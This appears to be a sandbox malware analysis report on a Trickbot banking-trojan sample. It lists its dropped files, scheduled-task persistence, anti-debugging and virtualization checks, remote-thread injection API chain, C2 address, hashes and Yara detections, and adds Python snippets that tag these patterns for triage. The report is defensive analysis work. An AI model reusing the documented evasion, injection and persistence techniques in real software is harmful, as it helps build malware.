Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exeCode function: 0_2_004233B8 LoadResource,LockResource,GetSysColor,GetSysColor,GetSysColor,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SelectObject,StretchDIBits,SelectObject,DeleteDC,ReleaseDC,0_2_004233B8
Creates files inside the user directoryShow sources
Source: C:\ProgramData\??????.exeFile created: C:\Users\user\AppData\Roaming\HomeLanJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe 'C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe'
Source: unknownProcess created: C:\ProgramData\??????.exe 'C:\ProgramData\??????.exe'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\HomeLan\??????.exe C:\Users\user\AppData\Roaming\HomeLan\??????.exe
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exeProcess created: C:\ProgramData\??????.exe 'C:\ProgramData\??????.exe' Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exeFile written: C:\Users\user\AppData\Roaming\HomeLan\settings.iniJump to behavior

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_0041B1EF GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_0041B1EF
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_00405340 push eax; ret 0_2_0040535E
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_00405B80 push eax; ret 0_2_00405BAE
Source: C:\ProgramData\??????.exe | Code function: 2_2_005C88E1 push esp; ret 2_2_005C88E5
Source: C:\ProgramData\??????.exe | Code function: 2_2_005C1F50 push eax; mov dword ptr [esp], 00000103h 2_2_005C1F52
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Code function: 3_2_006E88E1 push esp; ret 3_2_006E88E5
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Code function: 3_2_006E1F50 push eax; mov dword ptr [esp], 00000103h 3_2_006E1F52

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | File created: C:\ProgramData\??????.exe
Source: C:\ProgramData\??????.exe | File created: C:\Users\user\AppData\Roaming\HomeLan\??????.exe
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | File created: C:\ProgramData\??????.exe

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_004042FB IsIconic,GetWindowPlacement,GetWindowRect,0_2_004042FB
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_00411340 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,0_2_00411340
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_00420A57 GetParent,GetParent,GetParent,IsIconic,0_2_00420A57
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_00411AF0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,0_2_00411AF0
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_00425C28 IsIconic,IsWindowVisible,0_2_00425C28
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_0042ED76 IsWindowVisible,IsIconic,0_2_0042ED76
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_0042AFA7 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_0042AFA7
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Process information set: NOOPENFILEERRORBOX (13 occurrences)
Source: C:\ProgramData\??????.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Process information set: NOOPENFILEERRORBOX (7 occurrences)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | RDTSC instruction interceptor: First address: 6e8171 second address: 6e8171 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [esp+08h], eax 0x00000006 mov dword ptr [esp+0Ch], edx 0x0000000a mov eax, dword ptr [esp+08h] 0x0000000e mov dword ptr [esp+04h], 00000001h 0x00000016 lea edx, dword ptr [00000000h+eax*8] 0x0000001d test edx, 000007F8h 0x00000023 je 1F81FB82h 0x00000025 add ecx, eax 0x00000027 mov eax, ecx 0x00000029 mov esp, ebp 0x0000002b pop ebp 0x0000002c ret 0x0000002d xor edx, edx 0x0000002f div ebx 0x00000031 test esi, esi 0x00000033 mov ebp, edx 0x00000035 je 1F81FABCh 0x00000037 mov ecx, dword ptr [edi+ebp*4] 0x0000003a lea eax, dword ptr [esi+01h] 0x0000003d test ecx, ecx 0x0000003f jne 1F81F7B7h 0x00000041 mov esi, eax 0x00000043 call 1F823662h 0x00000048 push ebp 0x00000049 mov ebp, esp 0x0000004b and esp, FFFFFFF8h 0x0000004e sub esp, 10h 0x00000051 call dword ptr [006F9CECh] 0x00000057 jmp 1F81FA17h 0x00000059 jmp dword ptr [75761C4Ch] 0x0000005f mov ecx, dword ptr [7FFE0324h] 0x00000065 mov edx, dword ptr [7FFE0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | RDTSC instruction interceptor: First address: 6e8171 second address: 6e8171 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [esp+08h], eax 0x00000006 mov dword ptr [esp+0Ch], edx 0x0000000a mov eax, dword ptr [esp+08h] 0x0000000e mov dword ptr [esp+04h], 00000001h 0x00000016 lea edx, dword ptr [00000000h+eax*8] 0x0000001d test edx, 000007F8h 0x00000023 je 1F81F9E2h 0x00000025 add ecx, eax 0x00000027 mov eax, ecx 0x00000029 mov esp, ebp 0x0000002b pop ebp 0x0000002c ret 0x0000002d sub esi, ebx 0x0000002f xor edx, edx 0x00000031 xor ebp, ebp 0x00000033 div esi 0x00000035 mov esi, edx 0x00000037 add esi, ebx 0x00000039 test esi, esi 0x0000003b jle 1F81F701h 0x0000003d lea ebx, dword ptr [edi+esi] 0x00000040 call 1F81BC78h 0x00000045 push ebp 0x00000046 mov ebp, esp 0x00000048 and esp, FFFFFFF8h 0x0000004b sub esp, 10h 0x0000004e call dword ptr [006F9CECh] 0x00000054 jmp 1F81F9D7h 0x00000056 jmp dword ptr [75761C4Ch] 0x0000005c mov ecx, dword ptr [7FFE0324h] 0x00000062 mov edx, dword ptr [7FFE0320h] 0x00000068 mov eax, dword ptr [7FFE03
Contains functionality for execution timing, often used to detect debuggers
Source: C:\ProgramData\??????.exe | Code function: 2_2_005C8160 rdtsc 2_2_005C8160
Contains functionality to query network adapter information
Source: C:\ProgramData\??????.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,2_2_005D6780
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,3_2_006F6780
Found evasive API chain checking for process token information
Source: C:\ProgramData\??????.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_2-9757
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | API coverage: 2.7 %
Source: C:\ProgramData\??????.exe | API coverage: 6.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe TID: 3592 | Thread sleep time: -36000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_0041E050 FindFirstFileA,FindClose,0_2_0041E050
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_0041D790 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_0041D790
Source: C:\ProgramData\??????.exe | Code function: 2_2_005CD4B0 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose,2_2_005CD4B0
Source: C:\ProgramData\??????.exe | Code function: 2_2_005D5710 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose,2_2_005D5710
Source: C:\ProgramData\??????.exe | Code function: 2_2_005CC7C0 Sleep,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose,2_2_005CC7C0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Code function: 3_2_006ED4B0 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose,3_2_006ED4B0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Code function: 3_2_006F5710 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose,3_2_006F5710
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Code function: 3_2_006EC7C0 Sleep,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose,3_2_006EC7C0
Contains functionality to query system information
Source: C:\ProgramData\??????.exe | Code function: 2_2_005C1FB0 GetVersionExW,GetNativeSystemInfo,GetNativeSystemInfo,GetSystemInfo,2_2_005C1FB0
Program exit points
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | API call chain: ExitProcess graph end node graph_3-9659

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | System information queried: KernelDebuggerInformation
Contains functionality for execution timing, often used to detect debuggers
Source: C:\ProgramData\??????.exe | Code function: 2_2_005C8160 rdtsc 2_2_005C8160
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\ProgramData\??????.exe | Code function: 2_2_005CC6D0 LdrLoadDll,2_2_005CC6D0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_0041B1EF GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_0041B1EF
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_00402D50 mov eax, dword ptr fs:[00000030h] 0_2_00402D50
Source: C:\ProgramData\??????.exe | Code function: 2_2_005C35D0 mov ecx, dword ptr fs:[00000030h] 2_2_005C35D0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Code function: 3_2_006E35D0 mov ecx, dword ptr fs:[00000030h] 3_2_006E35D0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\ProgramData\??????.exe | Code function: 2_2_005C3180 GetProcessHeap,RtlReAllocateHeap,RtlAllocateHeap,2_2_005C3180
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_00409A06 SetUnhandledExceptionFilter,0_2_00409A06
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_00409A18 SetUnhandledExceptionFilter,0_2_00409A18
Source: C:\ProgramData\??????.exe | Code function: 2_2_005D2370 GetLastError,SetLastError,GetModuleHandleW,GetLastError,RtlAddVectoredExceptionHandler,SetCurrentDirectoryW,GetTickCount,Sleep,Sleep,CreateThread,GetTickCount,Sleep,Sleep,Sleep,CoUninitialize,OleUninitialize,ExitProcess,2_2_005D2370
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Code function: 3_2_006F2370 GetLastError,SetLastError,GetModuleHandleW,GetLastError,RtlAddVectoredExceptionHandler,SetCurrentDirectoryW,GetTickCount,Sleep,Sleep,CreateThread,GetTickCount,Sleep,Sleep,Sleep,CoUninitialize,ExitProcess,3_2_006F2370

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to create a new security descriptor
Source: C:\ProgramData\??????.exe | Code function: 2_2_005C3A80 GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,CloseHandle,2_2_005C3A80

Language, Device and Operating System Detection:

Contains functionality to inject threads in other processes
Source: C:\ProgramData\??????.exe | Code function: 2_2_005C1250 CreateEventW,CreateEventW,CreateEventW,CreateEventW,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,ResetEvent,ResetEvent,ResetEvent,ResumeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,VirtualFreeEx,VirtualFreeEx,2_2_005C1250
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Code function: 3_2_006E1250 CreateEventW,CreateEventW,CreateEventW,CreateEventW,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,ResetEvent,ResetEvent,ResetEvent,ResumeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,VirtualFreeEx,VirtualFreeEx,3_2_006E1250
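The signature entries above (token privilege adjustment, dynamic API resolution, process enumeration and the VirtualAllocEx / WriteProcessMemory / CreateRemoteThread injection chain) are all reported as flat "Code function:" call lists. The following is an added example, not part of the Joe Sandbox report, that parses those lines and tags each function with the behaviour its ordered API subsequence implies. The sample lines are copied from this report; the PATTERNS table is an assumed set of tagging rules, not something the sandbox emits.

```python
"""Tag Joe Sandbox 'Code function' API chains with the behaviour they imply.

Added example for this report, not part of the sandbox. The sample lines are
copied from the signature entries in the report; PATTERNS is an assumed set
of ordered API subsequences worth a tag.
"""
import re

# Assumed tagging rules: a chain matches when every API in the tuple occurs in
# this order; unrelated calls may sit in between.
PATTERNS = {
    "remote_thread_injection": ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"),
    "token_privilege_adjust": ("OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges"),
    "launch_as_other_user": ("DuplicateTokenEx", "CreateProcessAsUserW"),
    "dynamic_api_resolution": ("LoadLibraryA", "GetProcAddress"),
    "process_enumeration": ("CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"),
}

# Function ids look like 2_2_005C1250 (process_run_address) and bracket the chain.
FID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")


def parse_chain(line):
    """Return (function_id, [api, ...]) from one 'Code function:' report line."""
    _, sep, rest = line.partition("Code function:")
    if not sep:
        raise ValueError("not a Code function line: %r" % line)
    tokens = [t for t in re.split(r"[,\s]+", rest.strip()) if t]
    fids = [t for t in tokens if FID_RE.match(t)]
    apis = [t for t in tokens if not FID_RE.match(t)]
    return (fids[0] if fids else None), apis


def is_subsequence(needle, haystack):
    """True when the items of needle appear in haystack in order (gaps allowed)."""
    it = iter(haystack)
    return all(any(api == want for api in it) for want in needle)


def classify(line):
    """Return (function_id, sorted list of matching tags) for one report line."""
    fid, apis = parse_chain(line)
    return fid, sorted(tag for tag, seq in PATTERNS.items() if is_subsequence(seq, apis))


def tag_report(lines):
    """Map function id -> tags for every line that matched at least one rule."""
    return {fid: tags for fid, tags in map(classify, lines) if tags}


# Constructed input: four signature lines copied verbatim from this report.
SAMPLE_LINES = [
    r"Source: C:\ProgramData\??????.exe | Code function: 2_2_005C5470 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,CloseHandle,OpenProcessToken,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,AdjustTokenPrivileges,CloseHandle,2_2_005C5470",
    r"Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_0041B1EF GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_0041B1EF",
    r"Source: C:\ProgramData\??????.exe | Code function: 2_2_005CC440 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpW,lstrcmpW,Process32NextW,CloseHandle,lstrcmpW,2_2_005CC440",
    r"Source: C:\ProgramData\??????.exe | Code function: 2_2_005C1250 CreateEventW,CreateEventW,CreateEventW,CreateEventW,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,ResetEvent,ResetEvent,ResetEvent,ResumeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,VirtualFreeEx,VirtualFreeEx,2_2_005C1250",
]

if __name__ == "__main__":
    for fid, tags in tag_report(SAMPLE_LINES).items():
        print(fid, ", ".join(tags))
```

Ordered-subsequence matching rather than a plain set intersection is the point: GetProcAddress alone appears in almost every binary, and the injection chain above is only interesting because the allocate / write / create-thread calls occur in that order against a handle that is not the current process.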
Queries the volume information (name, serial number etc) of a device
Source: C:\ProgramData\??????.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\ProgramData\??????.exe | Code function: 2_2_005D4E70 GetSystemTimeAsFileTime,_aulldiv,2_2_005D4E70
Contains functionality to query the account / user name
Source: C:\ProgramData\??????.exe | Code function: 2_2_005D1960 Sleep,GetUserNameW,2_2_005D1960
Contains functionality to query time zone information
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_0040A95E GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0040A95E
Contains functionality to query windows version
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Code function: 0_2_00432740 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,0_2_00432740
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Trickbot
Source: Yara match | File source: 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ______.exe PID: 3448, type: MEMORY

Remote Access Functionality:

Yara detected Trickbot
Source: Yara match | File source: 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ______.exe PID: 3448, type: MEMORY

Behavior Graph

Behavior Graph ID: 982876 | Sample: 2019-10-21-Trickbot-gtag-mo... | Start date: 23/10/2019 | Architecture: WINDOWS | Score: 68

Signatures attached to the graph root:
  • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Detected Trickbot e-Banking trojan config
  • Yara detected Trickbot
  • May check the online IP address of the machine

Nodes and edges recorded in the graph:
  • 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe (started from the root): dropped C:\ProgramData\??????.exe (PE32) and C:\ProgramData\??????.exe:Zone.Identifier (ASCII); started ??????.exe
  • ??????.exe (started by the sample): dropped C:\Users\user\AppData\Roaming\...\??????.exe (PE32) and C:\Users\user\...\??????.exe:Zone.Identifier (ASCII); signature: Contains functionality to inject threads in other processes
  • ??????.exe (second root-level process): network to 81.190.160.139 port 449 from local port 49163 (unknown, Poland), 192.168.1.255 (unknown) and 3 other IPs or domains; signatures: Contains functionality to inject threads in other processes; Tries to detect virtualization through RDTSC time measurements

Simulations

Behavior and APIs

Time | Type | Description
11:33:31 | API Interceptor | 6x Sleep call for process: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe modified
11:33:37 | API Interceptor | 905x Sleep call for process: ??????.exe modified
11:33:38 | Task Scheduler | Run new task: Home lan application path: C:\Users\user\AppData\Roaming\HomeLan\.exe
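The scheduled task recorded above is the persistence mechanism: a task named "Home lan application" whose action points into the user's roaming profile, at a file whose name the report renders as nothing but an extension. The following is an added example, not part of Joe Sandbox, that parses that simulation line and scores the task action the way an analyst would triage it. The user-writable directory list and the treatment of "?" as the report's placeholder for characters outside its character set are assumptions.

```python
"""Triage a scheduled-task action path for malware-persistence traits.

Added example for this report, not from the sandbox. USER_WRITABLE is an
assumed list of profile locations a standard user can write to; the '?'
check assumes the report substitutes '?' for characters it cannot render.
"""
import re
from pathlib import PureWindowsPath

TASK_RE = re.compile(r"Run new task:\s*(?P<name>.+?)\s+path:\s*(?P<path>.+?)\s*$")

# Lowercased folder prefixes, compared from the first folder below the drive.
# None is a wildcard segment (the user name).
USER_WRITABLE = (
    ("programdata",),
    ("users", None, "appdata", "roaming"),
    ("users", None, "appdata", "local"),
)


def parse_task_event(line):
    """Return (task name, action path) from a 'Run new task:' simulation line."""
    m = TASK_RE.search(line)
    if not m:
        raise ValueError("not a task-scheduler event: %r" % line)
    return m["name"], m["path"]


def _matches_prefix(parts, prefix):
    """True when parts starts with prefix (None in prefix matches any segment)."""
    if len(parts) < len(prefix):
        return False
    return all(p is None or p == q for p, q in zip(prefix, parts))


def task_findings(action_path):
    """List of reasons the action looks like persistence; empty when nothing is off."""
    path = PureWindowsPath(action_path)
    parts = [p.lower() for p in (path.parts[1:] if path.drive else path.parts)]
    name = path.name
    findings = []
    if any(_matches_prefix(parts, pre) for pre in USER_WRITABLE):
        findings.append("action runs from a user-writable directory")
    if not name or name.startswith("."):
        findings.append("executable name is empty apart from its extension")
    if any(c == "?" or not 0x20 <= ord(c) <= 0x7E for c in name):
        findings.append("executable name contains non-printable or non-ASCII characters")
    return findings


def triage_events(lines):
    """Map task name -> findings for every task event that raised at least one."""
    out = {}
    for line in lines:
        name, path = parse_task_event(line)
        hits = task_findings(path)
        if hits:
            out[name] = hits
    return out


# Constructed input: the task event copied from this report's Simulations table.
SAMPLE_EVENTS = [
    r"Run new task: Home lan application path: C:\Users\user\AppData\Roaming\HomeLan\.exe",
]

if __name__ == "__main__":
    for name, hits in triage_events(SAMPLE_EVENTS).items():
        print(name)
        for h in hits:
            print("  -", h)
```

The same checks apply to the drop location from the Persistence section: C:\ProgramData\??????.exe trips both the writable-directory and the unrenderable-name rules, which is why a task action under ProgramData or AppData\Roaming with an odd file name deserves a closer look even before hashes are checked.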

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.541461598.0032A000.00000004.00000020.sdmp | JoeSecurity_Trickbot_1 | Yara detected Trickbot | Joe Security |
Process Memory Space: ______.exe PID: 3448 | JoeSecurity_Trickbot_1 | Yara detected Trickbot | Joe Security |

Unpacked PEs

No yara matches

Screenshots

Startup

  • System is w7_1
  • ??????.exe (PID: 3448 cmdline: C:\Users\user\AppData\Roaming\HomeLan\??????.exe MD5: 0A8D5A301D1EA44D5721045EEA07FDCD)
  • cleanup

Created / dropped Files

C:\ProgramData\??????.exe
Process: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
File Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes): 512000
Entropy (8bit): 7.047998801157124
Encrypted: false
MD5: 0A8D5A301D1EA44D5721045EEA07FDCD
SHA1: CD30CF4625BDAF04E90D6D287797066EB12B2A53
SHA-256: 3AFA27A900E73560FA108DF536A4FCE830AA1BA31EB9DD1D7D06402A1CAE0752
SHA-512: 29071FCB145BEEB4A7C7BFDB0775617438983E64AFD923887F308D7FFDCF1DFA1F88CB8333D3C5E3C522AB576ECD6BDE5EB69495DFA2CB3AC6829CAC847D04E4
Malicious: true
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ez/...|...|...|...|...|...|...|...|2..|y..|...|...|q..|...|...|B..|...|...|...|Rich...|........PE..L......].............................Q............@.................................m................................d..B... C..........2*..............................................................................`............................text...&........................... ..`.rdata..............................@..@.data...Hn...p...0...p..............@....rsrc...2*.......0..................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\??????.exe:Zone.Identifier
Process: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
File Type: ASCII text, with CRLF line terminators
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
